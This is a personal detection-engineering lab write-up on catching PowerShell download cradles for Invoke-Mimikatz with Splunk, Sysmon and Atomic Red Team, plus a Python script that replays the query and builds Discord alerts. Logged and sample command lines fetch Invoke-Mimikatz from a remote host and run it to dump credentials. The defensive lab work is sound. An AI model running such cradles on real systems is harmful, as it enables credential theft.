---
tags: [detection, splunk, attack-range, mitre, T1059.001]
date: {{date}}
status: complete
---
π§ͺ Lab 1: PowerShell Execution β T1059.001
✅ Status
- Simulate: `powershell.exe -EncodedCommand ...`
- Write SPL to detect it (EventCode 4688 + CommandLine)
- Save alert and document in vault
Description
Introduction
Mimikatz is a well-known post-exploitation tool used by attackers to dump credentials from Windows memory.
Detecting its execution is critical for defending against credential theft and privilege escalation.
In this lab, I use Splunk Free, Sysmon, and Windows Security Logs to build a detection for suspicious PowerShell execution of Invoke-Mimikatz.
Mapped to MITRE ATT&CK technique T1059.001 - PowerShell under the Execution tactic.
🛠️ Detection Approach
- Environment: Windows 10 host + Splunk Free
- Logging: Sysmon & Security Event Logs (Security Event ID 4688 only carries the command line when the "Include command line in process creation events" audit policy is enabled; Sysmon Event ID 1 always records it)
- Technique: MITRE ATT&CK T1059.001 - PowerShell
- Goal: Detect malicious PowerShell activity that downloads and executes Invoke-Mimikatz
Simulation Steps
Step 1 - Run Atomic T1059.001-1 Mimikatz
```powershell
PS C:\AtomicREdTeam\atomics> Invoke-AtomicTest T1059.001 -TestNumbers 1
```
Step 2 - Detect Mimikatz in Splunk
Splunk Query
The base search selects process-creation events (Security 4688 and Sysmon 1); replace `index=*` with the index the Windows logs land in. Each stage is piped into the next.
```spl
index=* (EventCode=4688 OR EventCode=1)
| eval CommandLine=lower(CommandLine)
| search CommandLine="*powershell*"
| search CommandLine="*iex*"
| table _time, host, user, parent_process_name, process_name, CommandLine
```
Step 3 - Write Detection/Connect to Discord Alerts
Splunk detected suspicious execution attempts:
- Host: KA-AR-WINDOWS
- User: localuser
- Parent Process: cmd.exe
- Process: powershell.exe
- Command Line: `powershell.exe "iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/powershellmafia/powersploit/.../invoke-mimikatz.ps1'); invoke-mimikatz -dumpcreds"`
Send alert to Discord Server using a script.
[Screenshots: Webhook to Discord; Mimikatz - actualshown -detection.png; T1059.001.png]
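As an added example (not the lab's own code, nor Atomic Red Team's or Splunk's), the script below replays the Step 2 SPL logic in Python over constructed sample events and packages each hit into the kind of Discord webhook payload the Step 3 alert script sends. The event field names, the sample command lines, the `example.invalid` host and the `DISCORD_WEBHOOK_URL` environment variable are assumptions; no webhook URL is embedded, so it runs offline.

```python
"""Added example, not the lab's own code: replays the lab's SPL logic in Python over
constructed process-creation events, then shapes each hit into a Discord webhook
payload. Assumptions (not from the lab): events are dicts carrying the field names the
lab's table uses (host, user, parent_process_name, process_name, CommandLine), and the
webhook URL comes from a hypothetical DISCORD_WEBHOOK_URL environment variable."""
import json
import os
import urllib.request

# Constructed sample events, not real telemetry. Events 1 and 2 mimic the Atomic
# T1059.001-1 cradle seen in the lab; 3 is benign admin PowerShell that must not fire;
# 4 is the -EncodedCommand variant from the lab's status checklist, which the "*iex*"
# filter does NOT catch because the script text is hidden inside the base64 argument.
SAMPLE_EVENTS = [
    {"_time": "2024-01-01T10:00:01", "host": "KA-AR-WINDOWS", "user": "localuser",
     "parent_process_name": "cmd.exe", "process_name": "powershell.exe",
     "CommandLine": "powershell.exe \"IEX (New-Object Net.WebClient).DownloadString("
                    "'https://example.invalid/invoke-mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\""},
    {"_time": "2024-01-01T10:00:02", "host": "KA-AR-WINDOWS", "user": "localuser",
     "parent_process_name": "explorer.exe", "process_name": "powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"iex (new-object net.webclient)"
                    ".downloadstring('https://example.invalid/x.ps1')\""},
    {"_time": "2024-01-01T10:05:00", "host": "KA-AR-WINDOWS", "user": "admin",
     "parent_process_name": "explorer.exe", "process_name": "powershell.exe",
     "CommandLine": "powershell.exe Get-Service -Name Spooler"},
    {"_time": "2024-01-01T10:06:00", "host": "KA-AR-WINDOWS", "user": "localuser",
     "parent_process_name": "cmd.exe", "process_name": "powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand <base64-placeholder>"},
]

TABLE_FIELDS = ("_time", "host", "user", "parent_process_name", "process_name", "CommandLine")


def detect_powershell_iex(events):
    """Python equivalent of the lab's SPL pipeline:
         | eval CommandLine=lower(CommandLine)
         | search CommandLine="*powershell*"
         | search CommandLine="*iex*"
         | table _time, host, user, parent_process_name, process_name, CommandLine
    Returns the matching rows restricted to the table's columns."""
    hits = []
    for ev in events:
        lowered = dict(ev)
        lowered["CommandLine"] = ev.get("CommandLine", "").lower()   # eval lower()
        cmd = lowered["CommandLine"]
        if "powershell" in cmd and "iex" in cmd:                      # the two wildcard searches
            hits.append({field: lowered.get(field) for field in TABLE_FIELDS})  # table ...
    return hits


def build_discord_alert(hit):
    """Shape one hit as a Discord webhook JSON payload; the fields mirror the lab's
    Step 3 write-up. The command line is wrapped in a code block so Discord does not
    render any markup inside it (embed field values are capped at 1024 characters)."""
    return {
        "username": "Splunk Lab Alerts",
        "embeds": [{
            "title": "T1059.001 - PowerShell download cradle detected",
            "fields": [
                {"name": "Host", "value": hit["host"], "inline": True},
                {"name": "User", "value": hit["user"], "inline": True},
                {"name": "Parent Process", "value": hit["parent_process_name"], "inline": True},
                {"name": "Process", "value": hit["process_name"], "inline": True},
                {"name": "Time", "value": hit["_time"], "inline": True},
                {"name": "Command Line", "value": "```" + hit["CommandLine"][:1000] + "```",
                 "inline": False},
            ],
        }],
    }


def send_discord_alert(payload, webhook_url=None):
    """POST the payload to the webhook. With no URL configured nothing is sent and
    False is returned, so the script runs offline; Discord answers 204 on success."""
    url = webhook_url if webhook_url is not None else os.environ.get("DISCORD_WEBHOOK_URL", "")
    if not url:
        return False
    req = urllib.request.Request(url, data=json.dumps(payload).encode("utf-8"),
                                 headers={"Content-Type": "application/json"}, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return 200 <= resp.status < 300


if __name__ == "__main__":
    for hit in detect_powershell_iex(SAMPLE_EVENTS):
        alert = build_discord_alert(hit)
        print(json.dumps(alert, indent=2))
        if not send_discord_alert(alert):
            print("DISCORD_WEBHOOK_URL not set: alert printed only, nothing sent")
```

Run as-is it prints two alerts and sends nothing; export `DISCORD_WEBHOOK_URL` to post them. The fourth sample event is there to make the coverage gap visible: the `*iex*` keyword filter from Step 2 does not fire on the `-EncodedCommand` form listed in the status checklist, so that variant needs a different source such as PowerShell Script Block Logging (Event ID 4104), which records the decoded script rather than the base64 argument.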
Takeaways
Cool first detection attempt. Can't wait to build more!